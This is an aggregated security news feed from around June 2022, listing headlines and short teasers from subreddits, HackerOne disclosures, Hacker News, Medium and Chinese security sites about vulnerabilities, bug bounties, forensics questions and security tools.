    Ok n00b question here, having an issue with EnCase 20.2. I just tried reinstalling for the 3rd time now, and I cannot for the life of me figure out why it won't detect my local storage HDD or a USB stick. I can see both in Fast Block SE but when I attempt to locate[add] either as evidence, nothing happens, even after unchecking or leaving the default options to add a local device. Not sure what's going on. https://preview.redd.it/ypfeszyamf491.jpg?width=1920&format=pjpg&auto=webp&s=7ca169e1544ab0bf5e2ac8bcbf612022173a38fe submitted by /u/Termin4lyIns4neLabs [link] [comments]
    Should I be able to create an AXIOM portable case that allows the user to view the file system?
    Just noticed that the file system view is grayed out in the portable case I made, not sure if I missed an option or if it's an inherent limitation with a portable case. submitted by /u/Expensive_Ad6442 [link] [comments]
  • Open

    Several Subdomains Takeover
    Reddit disclosed a bug submitted by 3amii: https://hackerone.com/reports/1591085
    XSS by clicking Jira's link
    GitLab disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1194254 - Bounty: $1130
    Gitlab Pages token theft using service workers
    GitLab disclosed a bug submitted by ehhthing: https://hackerone.com/reports/1439552 - Bounty: $1680
    "External status checks" can be accepted by users below developer access if the user is either author or assignee of the target merge request
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1375393 - Bounty: $610
    Stored XSS on issue comments and other pages which contain notes
    GitLab disclosed a bug submitted by jarij: https://hackerone.com/reports/1398305 - Bounty: $3000
    Reflected XSS on https://www.glassdoor.com/parts/header.htm
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1073712 - Bounty: $600
    Reflected XSS on https://help.glassdoor.com/gd_requestsubmitpage
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1094224 - Bounty: $500
    Open redirect on https://www.glassdoor.com/profile/siwa.htm via state parameter
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1097208 - Bounty: $100
  • Open

    New Technique: Extracting Clear-Text Credentials Directly From Chromium’s Memory
    submitted by /u/jat0369 [link] [comments]
    Using Windows Event Log IDs for Threat Hunting
    submitted by /u/sciencestudent99 [link] [comments]
    People’s Republic of China State-Sponsored Actors Exploit Network Providers and Devices
    submitted by /u/ksr_malware [link] [comments]
    CVE-2022-30287 - Remote Code Execution via Email in Horde Webmail
    submitted by /u/monoimpact [link] [comments]
    Confluence Webshells being dropped into the honeypot
    submitted by /u/Mr-R3b00t [link] [comments]
  • Open

    [Security Advisory] 泛微 (Weaver) E-Office file inclusion vulnerability (CNVD-2022-43247...
    Recently, CNVD officially published a 泛微 (Weaver) E-Office file inclusion vulnerability. Weaver has released a fix; all users are advised to download and update promptly...
    [Security Advisory] 泛微 (Weaver) E-Office SQL injection vulnerability (CNVD-2022-43246...
    Recently, CNVD officially published a 泛微 (Weaver) E-Office SQL injection vulnerability. Weaver has released a fix; all users are advised to download and update promptly...
  • Open

    Vulnerability Management in 4 Stages
    Article URL: https://ross-sec-audio.github.io//posts/Vulnerability-Management-in-4-Stages/ Comments URL: https://news.ycombinator.com/item?id=31671924 Points: 1 # Comments: 1
    Risk, Threat, or Vulnerability? What's the Difference
    Article URL: https://www.kennasecurity.com/blog/risk-vs-threat-vs-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31667578 Points: 1 # Comments: 0
    Updates for GKE Authorized Networks After Vulnerability Rewards Program Report
    Article URL: https://cloud.google.com/blog/products/identity-security/updates-coming-for-authorized-networks-and-cloud-runfunctions-on-gke Comments URL: https://news.ycombinator.com/item?id=31662195 Points: 1 # Comments: 0
  • Open

    My #Rightscon2022 keynote address at the Human Rights Journalists Network panel session on Media…
    Whether in Nigeria or somewhere in USA, citizens, and journalists are investigating and documenting human rights abuses. Darnella Fraizer… Continue reading on Medium »
    War in Ukraine / June 7
    The difficult process of postwar reconstruction Continue reading on Medium »
    Image Analysis -Osint Tools
    What is Image Analysis??? Continue reading on Medium »
    Gathering JUICY info from Instagram
    Hey hi everyone, I’m back with another interesting blog. In this blog I will show you how you can get private information of any Instagram… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-08 Review
    A brief discussion of device fingerprinting technology and its applications by ourren; Attribution and counter-attack case sharing (part 2) by ourren; Automated SQL script audit tool (MySQL) by ourren; Slides from the 2022 Cloud-Native Security Technology Summit by ourren; For more recent articles, visit SecWiki
  • Open

    [BugBounty] Tips to Find Stored XSS
    Intro Continue reading on InfoSec Write-ups »
  • Open

    Detecting DNS Tunneling using Spark Structured Streaming
    From generating DNS logs to end-to-end implementation of structured streaming Continue reading on InfoSec Write-ups »
  • Open

    Enterprises defending against cyber risk should focus on security platforms | Live from RSAC 2022
    As organizations move ever deeper into a highly interconnected digital ecosystem, how to respond to cyberattacks coming from every direction is a problem every CISO has to face.
    FreeBuf | EU mandates USB-C ports on Apple and other devices; CAICT publishes the "Software Bill of Materials Practice Guide"
    The European Parliament has reached agreement on proposed legislation that will require all future smartphones, including Apple's iPhone, to use a common USB-C port for charging.
    Cyber Asset Attack Surface Management (CAASM) becomes a new security approach | Live from RSAC 2022
    How CAASM can help enterprises take a complete inventory of cyber assets, continuously improve asset visibility and cloud configuration, and reduce the risk from security vulnerabilities became one of the focal points of RSAC 2022.
    Hacker gangs gain a "new member": AI hackers may arrive soon | Live from RSAC 2022
    RSAC 2022, known as the "Oscars" of the cyber world, was delayed until June. What new views does Schneier have on AI hacking this year?
    With malware and supply chain attacks on the rise, enterprises need to rethink their security strategies | Live from RSAC 2022
    The annual showcase of the global cybersecurity industry, RSA Conference 2022, is being held in San Francisco, USA, on June 6-9.
    Google pays residents $100 million in compensation for privacy violations
    Google Photos grouped similar faces appearing in photos without adequate prior notice and consent.
  • Open

    Hiding Your Covenant Grunts
    submitted by /u/Diesl [link] [comments]

  • Open

    Ebooks covering chemistry, military, logistics etc
    https://ftp.idu.ac.id/wp-content/uploads/ebook/ submitted by /u/c-rn [link] [comments]
  • Open

    [Windows] Hidden Bind Shell
    Hello! Today I will present to you a very interesting Bind Shell technique; we will hide from other hosts… Continue reading on Medium »
    HackTheBox — Paper [Write-up]
    Today I would like to change the pace and try some Easy challenges from HackTheBox. I picked Paper which is a The Office-themed machine… Continue reading on Medium »
    The Prince0f4llSaiyanz
    Hello and thanks to everyone who took the time to click here and read. My name is Xavier, known a few places as TheMadHatter or… Continue reading on Medium »
  • Open

    Question about hands on practice
    I'm gonna apologize in advance for my noobish question, but could you theoretically build an insecure piece of software or application (telegram like messenger for example) and practice exploitation locally (RCE potentially?) or is there more to it such as os level defense mechanisms that would prevent that? submitted by /u/WarmToiletSeat0 [link] [comments]
  • Open

    DogWalk 0-day vulnerability in Microsoft's Diagnostic Tool
    submitted by /u/CyberMasterV [link] [comments]
    AWS S3 Scanner: Online tool for finding misconfigurations
    submitted by /u/virtue-elliott [link] [comments]
    Network analysis of a targeted phish that got past Defender
    submitted by /u/tmpXXXXXX [link] [comments]
    Open source automated NIST SP 800-53 r5 benchmark for AWS (120+ controls!)
    submitted by /u/bobtbot [link] [comments]
    CVE-2022–29622: (In)vulnerability Analysis
    submitted by /u/JohnKeymanUK [link] [comments]
    Multiple vulnerabilities in Zyxel zysh
    submitted by /u/0xdea [link] [comments]
    Scanning statistics of vulnerable Atlassian Confluence Server(CVE-2022-26134) : Still lots of servers are exposed to the internet.
    submitted by /u/Late_Ice_9288 [link] [comments]
    Building Safe End-to-End Encrypted Services for Business - a Google Workspace perspective
    submitted by /u/ebursztein [link] [comments]
    Observed In The Wild: Atlassian Confluence Server CVE-2022-26134
    submitted by /u/netsecfriends [link] [comments]
  • Open

    How to get into Cyber Security in 2022
    Hello there! I hope you all are well and doing great in your life. Continue reading on Medium »
    Intigriti — XSS Challenge — April 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc this writeup will be long. Continue reading on Medium »
    Found 3 bugs in Similarweb.com which didn't pay
    Hi Folks, I found 3 bugs in Similarweb which didn't pay and didn't thank me; check it out. Continue reading on Medium »
    How Smartlook took a bug and didn't pay as they said they would & also has a bug bounty programme!
    Stored-XSS Admin Takeover From Low User app.smartlook.com Continue reading on Medium »
    Intigriti — XSS Challenge — March 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. This challenge was pretty interesting and one of my fav. Let’s start talking instead of wasting our time. Continue reading on Medium »
    Aurora Inflation Spend Bugfix Review: $6m Payout
    Summary Continue reading on Immunefi »
    . I have a nickname you are not going to like.
    Hello my friends, how are you? I hope you are well. Continue reading on Medium »
    An unusual way to find XSS injection in one minute
    Hi there! I think that many developers have heard that you can’t trust any user input, and indeed it is. However, there are some places… Continue reading on Medium »
    Bringing back sensitive files from web archives
    Technical details Continue reading on Medium »
  • Open

    Disclosing an unfixed Google Cloud Platform vulnerability post 90-day deadline
    Article URL: https://twitter.com/itspeterc/status/1534205155914264576 Comments URL: https://news.ycombinator.com/item?id=31659573 Points: 2 # Comments: 0
    Microsoft won't say if it will patch critical Windows vulnerability under exploit
    Article URL: https://arstechnica.com/information-technology/2022/06/microsoft-wont-say-if-it-will-patch-critical-windows-vulnerability-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=31658744 Points: 1 # Comments: 0
    Microsoft won’t say if it'll patch critical Windows vulnerability under exploit
    Article URL: https://arstechnica.com/information-technology/2022/06/microsoft-wont-say-if-it-will-patch-critical-windows-vulnerability-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=31652144 Points: 2 # Comments: 1
  • Open

    War in Ukraine / June 6
    Ukraine does not expect an attack from Belarus Continue reading on Medium »
    Top OSINT tools: find sensitive public information before hackers
    Top OSINT tools: find sensitive public information before hackers Continue reading on Medium »
    Bringing back sensitive files from web archives
    Technical details Continue reading on Medium »
  • Open

    SecWiki News 2022-06-07 Review
    A survey of industrial control system security by ourren; C-V2X security research by ourren; SecWiki Weekly (issue 431) by ourren; Exploring a way forward for IoT security in OT environments by h4ck01; Abusing hidden properties to attack the Node.js ecosystem by ourren; Using LATCH to block install-time attacks in the npm ecosystem by ourren; The rise and fall of typical cloud cryptomining gangs by Avenger; Military applications of Starlink by ourren; For more recent articles, visit SecWiki
  • Open

    Tip on working with E01 images of a Linux system -> accessing an LVM partition (Tsurugi Linux as a forensic workstation)
    submitted by /u/DFIRScience [link] [comments]
    Memory forensics analysis with Volatility | HackTheBox Export | Intro to Blue Team.
    submitted by /u/MotasemHa [link] [comments]
  • Open

    Path traversal, to RCE
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/733072 - Bounty: $12000
    Steal private objects of other projects via project import
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/743953 - Bounty: $20000
    Private objects exposed through project import
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/767770 - Bounty: $20000
    Path traversal in Nuget Package Registry
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/822262 - Bounty: $12000
    Store Admin Page Accessible Without Authentication at http://www.grouplogic.com/ADMIN/store/index.cfm
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1164854 - Bounty: $250
    Stored Cross Site Scripting at http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1164853
  • Open

    Atlassian Confluence Server CVE-2022-26134 being actively exploited in the wild
    Article URL: https://www.greynoise.io/blog/observed-in-the-wild-atlassian-confluence-server-cve-2022-26134 Comments URL: https://news.ycombinator.com/item?id=31652889 Points: 14 # Comments: 6
  • Open

    FreeBuf Morning Report | Italian city of Palermo goes offline after cyberattack; Facebook appoints its first CISO
    Hit by a cyberattack, the city of Palermo, with 1.3 million inhabitants, was forced to shut down all of its systems, with a huge impact on the wide range of operational services that residents and tourists depend on.
    Years of endpoint security experience: building full-chain security protection the Alipay way | Public lecture, June 24 at 19:00
    June 24 (Friday) at 19:00; see you there.
    Keyword "transformation": Talon wins the Innovation Sandbox contest | Live from RSAC 2022
    Startup Talon Cyber Security beat the field to win the Innovation Sandbox contest, becoming a "rising star" in the eyes of the cybersecurity industry.
    Cloud attack surface management has become the prevailing trend | Live from RSAC 2022
    Cloud attack surface management has long been an indispensable part of overall enterprise security.
    An Italian city shuts down its systems to resist a cyberattack
    The city of Palermo in southern Italy suffered a cyberattack, which had a huge impact on the city's operations, residents and tourists.
    Notes on exploiting a horizontal authorization bypass vulnerability
    A record of the full process of a horizontal authorization bypass.
  • Open

    Pandora from HackTheBox — Detailed Walkthrough
    No content preview
    Spring4Shell (SpringShell) Vulnerability
    No content preview
    VLAN Hopping Attack
    No content preview
    NoSQL Injection
    No content preview
    Hacking Nginx: Best ways
    No content preview
    Capture the Ether — Challenge Writeup
    I started concentrating in smart contract security and it is really interesting. Continue reading on InfoSec Write-ups »
  • Open

    Analysis of MSDT Code Injection Vulnerability(CVE-2022-30190)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1913/ 1. WTP doc:https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wintt/windows-troubleshooting-toolkit...
    Analysis of the CVE-2022-30190 MSDT code injection vulnerability
    Author: HuanGMz@Knownsec 404 Team Date: June 7, 2022 English version: https://paper.seebug.org/1914/ An analysis of the recent Microsoft Office-related MSDT vulnerability. 1. WTP framework Docs: https://docs.microsoft.com/en-us/previous-versions/windows/desk...
  • Open

    Best tool to clone NFC tags from a distance?
    I currently have the ProxMark3 but I need to get the NFC tag really close. Are there any modifications I can do? If not, what product would you recommend? submitted by /u/ErikDz11 [link] [comments]

  • Open

    Misconfigurated login page able to lock login action for any account without user interaction
    Reddit disclosed a bug submitted by h1ugroon: https://hackerone.com/reports/1582778
    2 Cache Poisoning Attack Methods Affect Core Functionality www.exodus.com
    Exodus disclosed a bug submitted by bismillahfortuner: https://hackerone.com/reports/1581454
    Registered users contact information disclosure on salesforce lightning endpoint https://disposal.gsa.gov
    U.S. General Services Administration disclosed a bug submitted by rptl: https://hackerone.com/reports/1443654
  • Open

    You too can be a neuroscientist. Videos.
    Duke Univ. https://histology.oit.duke.edu/MBS/Videos/Neuro/ submitted by /u/inoculatemedia [link] [comments]
    [NSFW] Two nude photo directories that I found
    I did try to do a search to see if these links have come up before, and I didn't find anything. If they, in fact, did, then that's my bad. https://www.iammoon.com/helpers/boobs/ http://zascar.com/files/gifs/boobies/ submitted by /u/VerifiedNSFWThrowawa [link] [comments]
    HTTrack capturing the wrong link when I use the "Capture URL" feature?
    So I'm trying to download webpages from my Canvas portal (Learning Management System that has the history of all my grades, assignments, etc.) from my viewpoint logged in, for personal record. It uses two-factor authentication so I have to use the "Capture URL" feature. When I enter the provided proxy info into the browser and go to the webpage, instead of capturing the main page it keeps capturing a different link. Instead of http://[myuniversity].instructure.com/ it captures the URL as http://oscp.piki.googl/ with a string of numbers following it. I was wondering what could be going wrong here and how to fix it? I'm using the GUI Windows version of HTTrack. submitted by /u/beyondtheleaves [link] [comments]
  • Open

    Intigriti — XSS Challenge — February 2022  — Bug Bounty Hunting — Writeup
    Hello guys I am back. This challenge was awesome btw. So let’s start talking. Continue reading on Medium »
    Intigriti — XSS Challenge — January 2022 — Writeup
    Hello guys I am back. I was bored so I decided to post some Intigriti’s writeups until new XSS challenge comes now at June 20. So let’s… Continue reading on Medium »
    How I gave rest to company’s email updates service
    Hello everyone, hope you all are doing well Continue reading on Medium »
    Wgel Walkthrough
    Welcome back, folks!! Today presenting one more boot to root kind of box from TryHackMe. It is a beginner-level box with some cool… Continue reading on Medium »
    Hacking Nginx: Best ways
    Nginx is being used in the wild since a while now. We all have seen NGINX name somewhere while coding/hacking. NGINX has always been a… Continue reading on InfoSec Write-ups »
    What I learnt from reading 126* Information Disclosure Writeups.
    Let’s tackle the most valuable and mysterious bug type… Continue reading on Medium »
    AlbusSec:- Penetration-List 07 Cross-Side-Request-Forgery(CSRF) — Sample-2
    Hi Information Security folk, I hope you are well and doing great in your life, Before we go to the next step, You’ll need to learn about… Continue reading on Medium »
    My Pentest Log -21 — (Content-Type Checks)
    Greetings everyone from Porta Platea, Continue reading on Medium »
  • Open

    Shining the Light on Black Basta - documents some of the TTPs employed by a threat actor group who were observed deploying Black Basta ransomware
    submitted by /u/digicat [link] [comments]
    Passwordstate - Revoked its Digicert certificate used to sign the code
    submitted by /u/_r3l0ad3d [link] [comments]
    ESP-IDF Setup Guide - A guide on setting up an environment for ESP32 vulnerability research
    submitted by /u/Gallus [link] [comments]
  • Open

    Microsoft Follina Vulnerability in Windows Can Be Exploited Through Office 365
    Article URL: https://www.wired.com/story/microsoft-follina-vulnerability-windows-office-365/ Comments URL: https://news.ycombinator.com/item?id=31643486 Points: 1 # Comments: 0
    ESP-IDF Setup Guide – Setting up an environment for ESP32 vulnerability research
    Article URL: https://www.elttam.com/blog/esp-idf-setup-guide/ Comments URL: https://news.ycombinator.com/item?id=31637749 Points: 2 # Comments: 0
  • Open

    War in Ukraine / June 3–5
    Ukraine is facing a shortage of everything Continue reading on Medium »
    Ministry of Public Security — Chinese Cyber Espionage Over 19 Million People
    Continue reading on Medium »
    Use of Web Archive In OSINT Investigation ! Go back to past
    Using web archives allows you to see what a web page or site looked like in the past ! Continue reading on Medium »
  • Open

    Can Video Signal Adaptors (eg: displayport to HDMI) compromise your system?
    title. I'm aware how USB devices can compromise your system, and generally try to avoid hardware made from dubious countries (cheap GPUs from China anyone?) I'm in a bit of a pickle over video signal adaptors though. Where I'm from, practically all of these adaptors are manufactured in China. It also seems that some of them do active encoding/decoding between the various video signal types (VGA, HDMI, Displayport). From a purely technical perspective, can these adaptors compromise a system? Edit: Found this - https://www.ehacking.net/2016/07/exploring-vulnerabilities-in-hdmi.html submitted by /u/tappervogine [link] [comments]
    RIPE IP addresses
    This is a crazy question. I have a coworker who is convinced that all RIPE IP addresses carry a higher risk than, say, ARIN or other internet registries? I have a lot of respect for this person but I think this is an incorrect assumption? Thoughts? Thanks submitted by /u/DCbasementhacker [link] [comments]
  • Open

    SecWiki News 2022-06-06 Review
    Studying the CVE-2022-30190 vulnerability, part 1 by 嘿嘿哈哈; For more recent articles, visit SecWiki
  • Open

    What's everyone using for remote memory acquisition?
    Hello. I say "remote" because most of our laptops are users WFH. What's everyone using to capture a memory image then acquire on remote workstation or server? submitted by /u/antmar9041 [link] [comments]
    What will it take to change the career path?
    Hi, everyone! The question is more out of curiosity... I've been in the IT industry for about 6 years now, mainly working as a sysadmin. I was recently promoted to cyber security analyst and started taking classes to suit my new position. One of my classes is digital forensic analysis and I have always been fascinated by this field. Not like I am unhappy in my new role, and I definitely want to stay in these shoes for some time to build up my experience and knowledge and work on my portfolio. But I am wondering what and where I should start if I decide to go toward digital forensics? Thank you! submitted by /u/Austronaut1403 [link] [comments]
    Will the Real Msiexec Please Stand Up? Exploit Leads to Data Exfiltration
    🔥 New report out from TheDFIRReport crew! - ManageEngine SupportCenter Plus exploited - LSASS dump from web shell - Plink / RDP / Exfiltration Enjoy! https://t.co/J0Kpho5VU7 submitted by /u/samaritan_o [link] [comments]
  • Open

    Pen #005: Linux Basics (Part 2)
    No content preview
  • Open

    In-depth analysis of the CVE-2022-26134 Confluence OGNL RCE vulnerability and a sandbox bypass for command echo on newer versions
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/nCMtSD7QH8ai6fpurJBXTg Vulnerability information: Atlassian recently disclosed a critical Confluence vulnerability, CVE-2022-26134. Judging from the description, this is once again an OGNL expression injection vulnerability. Affected versions are as follows: from 1.3.0 before 7.4.17 from 7.13.0 before 7.13...
    Follina Microsoft Office RCE with MS-MSDT Protoco
    Author: Y4er Original link: https://y4er.com/post/follina-microsoft-office-rce-with-ms-msdt-protocol/ Preface: Saw a fun Office RCE posted on Twitter. It seems to have originated from nao_sec's tweet, and then I found an analysis article. https://doublepulsar.com/follina-a-microsoft-office-c...
  • Open

    Understanding threat modeling in one article
    What threat modeling means, how it works, the mainstream threat modeling frameworks, tools and best practices.
    Comparison of 8 major predictive analytics tools
    These tools include complex pipelines for collecting data from across the enterprise, add layers of statistical analysis and machine learning to make predictions about the future, and distill those insights into useful summaries that business users can act on.
    Roundup: 9 identity and access management tools
    Ensuring secure access and identity management are two foundations of a cybersecurity posture.
    FreeBuf Morning Report | Fix for Confluence zero-day vulnerability released; a Shaanxi company livestreams its employees at work
    Atlassian has addressed an actively exploited critical remote code execution vulnerability (CVE-2022-26134) in its Confluence Server and Data Center products.
    Cryptocurrency scams may have caused more than $1 billion in losses in the US
    Between January 2021 and March 2022, more than 46,000 Americans reported being victims of cryptocurrency fraud, with losses of no less than $1 billion.
    In 2021, Apple blocked 1.6 million apps that defrauded users
    Apple's App Store review team blocked more than 343,000 iOS apps that violated privacy rules.
    New Windows Search zero-day vulnerability can be exploited with remotely hosted malware
    Attackers can exploit it by launching a Word document.
    Research launched for the "CCSIP 2022 China Cybersecurity Industry Panorama" | FreeBuf Consulting
    Comprehensive because it is macro-level: the CCSIP 2022 Panorama is officially launched.
    High-severity vulnerability disclosed in UNISOC (紫光展锐) chips can block phones from connecting to the network
    UNISOC said it will fix the vulnerability immediately; Google also said it will fix the vulnerability in the next Android security patch.
    GitLab fixes a high-severity account takeover vulnerability in a security update
    GitLab released critical security updates for multiple versions of its Community Edition and Enterprise Edition products to address 8 vulnerabilities, one of which is a high-severity account takeover vulnerability.
    亿格云: Using SASE to solve the three major challenges facing enterprise digitalization | Cybersecurity New Forces SOLO Launch Season
    Now that remote work has become the norm, how do you achieve unified enterprise security management? The Cybersecurity New Forces SOLO Launch Season tells you!

  • Open

    How does Docker run Containers Under the Hood
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Heap overflow via HTTP/2 PUSH_PROMISE
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1589847
    KRB-FTP: Security level downgrade
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1590102
  • Open

    Cloudflare observations of Confluence zero day (CVE-2022-26134)
    Article URL: https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/ Comments URL: https://news.ycombinator.com/item?id=31634770 Points: 6 # Comments: 0
    Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134)
    Article URL: https://bugalert.org/content/notices/2022-06-02-confluence.html?src=tw Comments URL: https://news.ycombinator.com/item?id=31626703 Points: 1 # Comments: 0
  • Open

    How Attacker could have suffocated the company staff
    Background: Continue reading on Medium »
    If It’s a Feature!!! Let’s Abuse It for $750
    Hello mates, Continue reading on Medium »
    Log Poisoning to Remote Code Execution | LFI | cUrl|
    In this article, we will see how to perform Remote Code Execution through Log Poisoning which is a type of Local File Inclusion. Continue reading on System Weakness »
  • Open

    “It’s Full of Secrets and User-Generated Classified Cyber Attack Information” — An Inside Peek
    A modern whiz-kid child story of the son of an ex-Communist era famous family from Bulgaria up to present day deep from the trenches. Continue reading on Medium »
    Hong Kong police tightening control over citizens on June 4th
    As they did last year, the Hong Kong administration tightened security and warned its residents not to gather to commemorate China’s… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In this week’s OSINT-inspired geek edition of the good news roundup, Russia’s tech industry reels under sanctions, and much more. Continue reading on Medium »
    Why the war? A quantitative answer
    Can looking at Russian and Ukrainian news wires shed light on the question? Continue reading on Medium »
    SPY NEWS: 2022 — Week 22
    Summary of the espionage-related news stories for the Week 22 (29 May-4 June) of 2022. Continue reading on Medium »
  • Open

    Old Blackberry (8300)
    I need to create a forensics copy from an old Blackberry 8300. Any suggestion? Thanks submitted by /u/Zipper_Ita [link] [comments]
    Let's solve challenges - Cellebrite 2022 CTF Writeup
    Despite having had little time, I took part in the lovely #CellebriteCTF last week! Please enjoy my writeup: https://www.dfirblog.com/cellebrite-2022-ctf-writeup/ Feel free to provide any feedback you desire! submitted by /u/samaritan_o [link] [comments]
    Decrypting a password locked .RAR file
    Hey there, I have a .RAR file that contains a backup of a Samsung phone. This file is created using Smart Switch - a Samsung software that creates a backup of the entire phone. The file is about 9GB. My client set a password for the backup, but now they forgot their password. They however, have several decrypted files when they extracted the RAR file a few years back – when they still knew the password. These decrypted files range from jpegs to mp4 and to pdfs. The directories in the RAR file can still be accessed with WinRAR. I can open the folders and see the contents of it including their metadata (i.e. date modified, file type, file size). But when I try to extract or open them, I am prompted to type a password. I know this seems like a long shot, but is there any chance the entire RAR file can be decrypted using some of the decrypted files? submitted by /u/wrappedbubble [link] [comments]
  • Open

    Nidhogg rootkit - An all in one rootkit for all windows 10 versions and windows 11 that can be managed with single hpp file
    submitted by /u/Idov31 [link] [comments]
    Analysis of a large brute force attack campaign against Windows Remote Desktop
    submitted by /u/jwizq [link] [comments]
    Conti RaaS group chat leaked (English translation) about firmware exploit and implant
    submitted by /u/hardenedvault [link] [comments]
    Code for Beating Google ReCaptcha and the funCaptcha using AWS Rekognition
    submitted by /u/ScottContini [link] [comments]
  • Open

    I want to dive into exploit dev; do I need to learn assembly language?
    submitted by /u/Doom_Guy777 [link] [comments]
  • Open

    SecWiki News 2022-06-05 Review
    In computer science research, where does the initial point of innovation come from? by ourren; For more recent articles, visit SecWiki
  • Open

    Xepor: a web routing framework for reverse engineering and security analysis
    Xepor is a web routing framework designed for reverse engineers and security researchers; the tool offers researchers Flask-like API functionality.
    Tornado: a powerful anonymous reverse shell for red teams
    Tornado is a powerful red/blue team security research tool and also a powerful anonymous reverse shell.
    Java deserialization basics: class loaders
    This article/note intends to go from class loaders and parent delegation to the loading order of code blocks, and only then to loading bytecode.
    EvilBox-One target machine penetration
    EvilBox: One is an easy-level target machine for VirtualBox.
  • Open

    Tails 5.1 arrives with a fix for a serious JavaScript security vulnerability
    Article URL: https://www.neowin.net/news/tails-51-arrives-with-a-fix-for-a-serious-javascript-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31630555 Points: 1 # Comments: 0
  • Open

    Creating a backdoor in PAM in 5 line of code
    No content preview
    Owasp crAPI: Introducing API Security The Hacker Way
    No content preview
    Testing EDRs for Linux — Things I wish I knew before getting started
    No content preview
  • Open

    Hunting suspicious LDAP queries in tons of logs
    Enumeration and Reconnaissance in AD Environment Continue reading on Medium »

  • Open

    I Have Found Several Bugs In Circle.so & They Didn't Pay
    Hi Folks, Continue reading on Medium »
    Iagon Token Bridge UI Bug Bounty
    You better watch out, it’s bug hunting season! Continue reading on Iagon Official »
    Networking Protocols Explained | CyberSecurity
    Networking Protocols: FTP, SSH, Telnet, SMTP, DNS, HTTP, HTTPS, POP3, IMAP, RDP, TCP, UDP, ARP, RARP, DHCP, MTP, SFTP, SSL, TLS, NTP, PPP… Continue reading on Medium »
    DNS in easy way
    DNS is the phonebook of the internet, where domain names are translated to IP addresses. Computer Continue reading on Medium »
  • Open

    What are some free non-zero policy encryption sites that protect data?
    I currently use Tresorit, and I store a single DB file of my customers on their site. However, I recently lost access and couldn't recover that file, but I did have a backup elsewhere. Instead of recovering the account, I was forced to reset my account because of said zero knowledge policy. submitted by /u/inert- [link] [comments]
    SynAck Red Team
    Hi, I saw many people mentioning they're part of SynAck Red Team. Is that a job ? are they getting paid ? submitted by /u/Spare_Prize1148 [link] [comments]
    How Likely is a Malicious MITM Attack on the Cellular Network?
    Hi everyone, For background: I have been playing around with a SIM7000e 4g module that connects to the CAT-M1 cellular network here in Australia. I purchased it in order to send GPS coordinates to dweet . io. Essentially I want to make a GPS tracker for my motorcycle. The thing is: I can send data via HTTP but not HTTPS. I have been trying for so many hours to send data via HTTPS with no luck. Some AT commands you're supposed to input, the module doesnt seem to even recognize. But thats not why I am here. I wanted to ask how likely is it that a hacker could use something like a stingray to grab my GPS coordinates if I sent them via HTTP? Does this type of attack happen often? (No personal details or other info would be sent with the coordinates) I have heard that devices like stingrays are extremely hard to get and very expensive. Furthermore, a hacker would not immediately no what the numbers mean, and even if they did, would not know what is currently situated at those coordinates. I am assuming that I am just being paranoid? Thanks submitted by /u/F0restFiend [link] [comments]
    Please help me with an internet stalker
    My best friend has been recently bombarded with dms on Instagram. They come from accounts that either have her name, birth date, or something along the lines. The messages are very graphic and threatening, telling her that if she attends a party or something they will sexually assault her or in some cases, end with her life. One of these accounts has also sent her a photo of her own house with similar caption. They messaged her mom, her friends, basically everyone in her social circle. The case has already been presented to the police but there's been no advances and each day she grows concerned. Is there any way to track a location, an email, a name, just... anything, if I provide a link to one of the profiles? I already tried out online tools and none have proven to be successful. If this weren't of such urgency I would not be asking, but we are running out of options. Each day is more terrifying for her, and painful for us, her friends. Thank you in advance. submitted by /u/smly7 [link] [comments]
  • Open

    Github Account Takeover from Docs page of `kubernetes-csi.github.io`
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1434967 - Bounty: $100
  • Open

    My website/domain investigation toolkit
    Domain and hosting data Reverse lookup Traffic and CMS analysis AD and DNS analysis  Backup and other services Continue reading on Medium »
    Ethereum OSINT
    I watched an interesting speech by Jeff Lomas, Detective and Criminologist with the Las Vegas Police Department on the investigation of… Continue reading on Medium »
    A Guide To Twitter advanced search operators: twitter hacking
    Social media intelligence (SMI or SOCMINT) Continue reading on Medium »
  • Open

    SecWiki News 2022-06-04 Review
    Analysis of port-scanning technique implementations, by ourren; Awesome-Redteam: a red-team knowledge repository, by ourren; Attack and defense on the ATT&CK matrix, by ourren; Analysis of the bandit tool, by ourren; Hands-on code auditing based on framework vulnerabilities, by ourren; Getting started with MITRE ATT&CK in practice, by ourren; Tomcat CVE-2022-29885, by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Certificate Ripper released - tool to extract server certificates
    submitted by /u/Hakky54
    Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552) - including remote write anywhere primitive in its IP stack
    submitted by /u/digicat
  • Open

    How a Newbie Can Master mimikatz
    mimikatz was a hurdle I ran into; I want to document the process to help everyone pick up mimikatz's usage and tricks faster.
  • Open

